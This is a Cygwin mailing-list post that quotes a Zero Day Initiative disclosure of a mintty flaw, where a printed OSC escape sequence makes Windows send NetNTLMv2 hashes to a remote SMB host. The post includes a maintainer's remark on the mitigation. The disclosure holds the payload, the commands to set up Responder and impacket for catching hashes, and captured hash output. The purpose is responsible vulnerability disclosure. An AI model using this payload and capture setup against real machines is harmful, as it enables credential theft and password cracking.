On 16.08.2024 at 16:25, zdi-disclosures--- via Cygwin wrote:
The attachment could not be scanned for viruses because it is a password 
protected file.
ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information 
Disclosure Vulnerability
???
-- CVSS -----------------------------------------

5.3: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

-- ABSTRACT -------------------------------------

Trend Micro's Zero Day Initiative has identified a vulnerability affecting the 
following products:
Mintty - Mintty

-- VULNERABILITY DETAILS ------------------------
* Version tested: 3.7.1 (Git-2.45.2-64-bit.exe)
* Installer file: Git-2.45.2-64-bit.exe
* Platform tested: win11 23h2 [Version 10.0.22631.3593]

---

### Analysis

Several escape sequences can cause the mintty process to access a file at a
specific path. It is triggered simply by printing them out in bash, e.g.
`\x1b]7773;//0.0.0.0/test\007`.
An attacker can specify an arbitrary network path and negotiate an NTLM hash
out of the victim's machine to an attacker-controlled remote host.
NetNTLMv2 hashes can be used for Pass the Hash, or for password cracking using
tools like hashcat or John the Ripper.

It's caused by an API provided by msys2.
The API is used to convert between POSIX and Windows paths, but it also checks
for symbolic links, which is enough to trigger the vulnerability.
The same code is forked from Cygwin, so it could also theoretically be
vulnerable.

In the exploit, the escape code for setting the terminal icon (OSC 7773) was
used, but it can be done with other escape codes as well.
For example, there's an escape code for indicating the cwd of the shell,
which can lead to mintty `stat`ing the directory, which is sufficient for
exploitation.

The following cover most of the escape codes that could be exploited:
```
- OSC I / OSC 7773
- OSC 440
- OSC 11
- OSC 7
- OSC 8
```
Since mintty 3.7.0, option GuardNetworkPaths and its default setting
prevents this exploit.
Thomas

The call stack is roughly the following:
```
mintty:
src/winmain.c:308 - guardpath
src/charset.c:1104 - path_posix_to_win_w
msys2:
cygwin_create_path (depends on mintty's compilation flags, but it calls 
cygwin_conv_path regardless)
winsup/cygwin/path.cc:3909 - cygwin_conv_path
winsup/cygwin/path.cc:660 - path_conv::check
```

`path_conv::check` calls several windows apis that cause a connection to a 
remote path to be initiated.



Here are the reproduction steps.

Set up an attacker VM (Linux-based) and a victim VM (Windows).

Modify the payload for the appropriate ip address (attacker vm's ip):

```
\x1b]7773;//0.0.0.0/test\007
```

On the Attacker's machine run either 
[impacket](https://github.com/fortra/impacket)'s smbserver.py or 
[Responder](https://github.com/lgandx/Responder) with smb server enabled:

```
sudo smbserver.py -ts -smb2support test .
```

```
sudo ./Responder.py -I enp1s0 -v
```

Replace `enp1s0` with the proper interface.

Make sure that other smb services aren't running:

```
systemctl status smbd.service
systemctl status nmbd.service
```

Print the adjusted payload from the beginning in mintty (git-bash.exe).

The victim's hash should be printed by impacket or Responder.




Here is the output from Responder (the same capture repeats for every
connection attempt; only two complete entries are shown):
```
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 172.16.16.237
[SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
[SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:ae5464fd841bcab6:F76567E68408F2B04E41B869711E76F8:010100000000000000D29167A9CCDA01E0A7FFF1FF381FA60000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
[...]
[SMB] NTLMv2-SSP Client   : 172.16.16.237
[SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
[SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:e8f874be1a16042c:255BDD064E5A8C080FC3E0438A1D3502:010100000000000000D29167A9CCDA01F2A0B31CD1B4EB190000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
[...]
```

Procmon log:
```
Date:   7/8/2024 2:07:57.3678237 PM
Thread: 4844
Class:  File System
Operation:      CreateFile
Result: ACCESS DENIED
Path:   \\[attacker IP]\test007\
Duration:       0.0112557
Desired Access: Read EA, Read Attributes, Read Control
Disposition:    Open
Options:        Open Reparse Point
Attributes:     n/a
ShareMode:      Read, Write, Delete
AllocationSize: n/a

Description:
Company:
Name:   bash.exe
Version:
Path:   C:\Program Files\Git\usr\bin\bash.exe
Command Line:   "C:\Program Files\Git\usr\bin\bash.exe" --login -i
PID:    6172
Parent PID:     1844
Session ID:     1
User:   DESKTOP-QAVUII5\wmliang
Auth ID:        00000000:0015a222
Architecture:   64-bit
Virtualized:    False
Integrity:      Medium
Started:        7/8/2024 2:07:57 PM
Ended:  7/8/2024 2:07:57 PM
Modules:
bash.exe        0x100400000     0x245000        C:\Program Files\Git\usr\bin\bash.exe                   1/14/2024 5:25:36 AM
msys-2.0.dll    0x210040000     0x1227000       C:\Program Files\Git\usr\bin\msys-2.0.dll       Red Hat 3.4.10-87d5722901e1172a57aa4d4e3db84fbafe70d19b 2/14/2024 4:11:38 PM

0       FLTMGR.SYS      FltGetStreamContext + 0x20cb    0xfffff8045abe961b      C:\Windows\System32\drivers\FLTMGR.SYS
1       FLTMGR.SYS      FltGetStreamContext + 0x1b51    0xfffff8045abe90a1      C:\Windows\System32\drivers\FLTMGR.SYS
2       FLTMGR.SYS      FltRequestFileInfoOnCreateCompletion + 0x4ef    0xfffff8045ac21f6f      C:\Windows\System32\drivers\FLTMGR.SYS
3       ntoskrnl.exe    IofCallDriver + 0x55    0xfffff80455c29b45      C:\Windows\system32\ntoskrnl.exe
4       ntoskrnl.exe    ProbeForWrite + 0x40fe  0xfffff8045619c8be      C:\Windows\system32\ntoskrnl.exe
5       ntoskrnl.exe    ObOpenObjectByNameEx + 0x1844   0xfffff804560cc9e4      C:\Windows\system32\ntoskrnl.exe
6       ntoskrnl.exe    ObOpenObjectByNameEx + 0x1f2    0xfffff804560cb392      C:\Windows\system32\ntoskrnl.exe
7       ntoskrnl.exe    NtCreateFile + 0x4c1    0xfffff80456194311      C:\Windows\system32\ntoskrnl.exe
8       ntoskrnl.exe    NtCreateFile + 0x79     0xfffff80456193ec9      C:\Windows\system32\ntoskrnl.exe
9       ntoskrnl.exe    setjmpex + 0x9045       0xfffff80455e2d505      C:\Windows\system32\ntoskrnl.exe
10      ntdll.dll       NtCreateFile + 0x14     0x7ffb3fdf03f4  C:\Windows\System32\ntdll.dll
11      msys-2.0.dll    setpassent + 0x2ff3     0x2100929c3     C:\Program Files\Git\usr\bin\msys-2.0.dll
12      msys-2.0.dll    cygwin_split_path + 0x2c68      0x210096988     C:\Program Files\Git\usr\bin\msys-2.0.dll
13      msys-2.0.dll    sigfillset + 0x6935     0x2100c40a5     C:\Program Files\Git\usr\bin\msys-2.0.dll
14      msys-2.0.dll    sigfillset + 0x7f98     0x2100c5708     C:\Program Files\Git\usr\bin\msys-2.0.dll
15      msys-2.0.dll    sigfillset + 0x9f81     0x2100c76f1     C:\Program Files\Git\usr\bin\msys-2.0.dll
16      msys-2.0.dll    timegm + 0x4db  0x210193f2b     C:\Program Files\Git\usr\bin\msys-2.0.dll
17      <unknown>       0x110000000     0x110000000
```


-- CREDIT ---------------------------------------
This vulnerability was discovered by:
solid-snail working with Trend Micro Zero Day Initiative

-- FURTHER DETAILS ------------------------------

Supporting files:


If supporting files were contained with this report they are provided within a 
password protected ZIP file. The password is the ZDI candidate number in the 
form: ZDI-CAN-XXXX where XXXX is the ID number.

Please confirm receipt of this report. We expect all vendors to remediate ZDI 
vulnerabilities within 120 days of the reported date. If you are ready to 
release a patch at any point leading up to the deadline, please coordinate with 
us so that we may release our advisory detailing the issue. If the 120-day 
deadline is reached and no patch has been made available we will release a 
limited public advisory with our own mitigations, so that the public can 
protect themselves in the absence of a patch. Please keep us updated regarding 
the status of this issue and feel free to contact us at any time:

Zero Day Initiative
zdi-disclosu...@trendmicro.com

The PGP key used for all ZDI vendor communications is available from:

   http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc

-- INFORMATION ABOUT THE ZDI --------------------
Established by TippingPoint and acquired by Trend Micro, the Zero Day 
Initiative (ZDI) neither re-sells vulnerability details nor exploit code. 
Instead, upon notifying the affected product vendor, the ZDI provides its Trend 
Micro TippingPoint customers with zero day protection through its intrusion 
prevention technology. Explicit details regarding the specifics of the 
vulnerability are not exposed to any parties until an official vendor patch is 
publicly available.

Please contact us for further details or refer to:

   http://www.zerodayinitiative.com

-- DISCLOSURE POLICY ----------------------------

Our vulnerability disclosure policy is available online at:

   http://www.zerodayinitiative.com/advisories/disclosure_policy/

TREND MICRO EMAIL NOTICE

The information contained in this email and any attachments is confidential and 
may be subject to copyright or other intellectual property protection. If you 
are not the intended recipient, you are not authorized to use or disclose this 
information, and we request that you notify us by reply mail or telephone and 
delete the original message from your mail system.

For details about what personal information we collect and why, please see our 
Privacy Notice on our website at: http://www.trendmicro.com/privacy



--
Problem reports:      https://cygwin.com/problems.html
FAQ:                  https://cygwin.com/faq/
Documentation:        https://cygwin.com/docs.html
Unsubscribe info:     https://cygwin.com/ml/#unsubscribe-simple
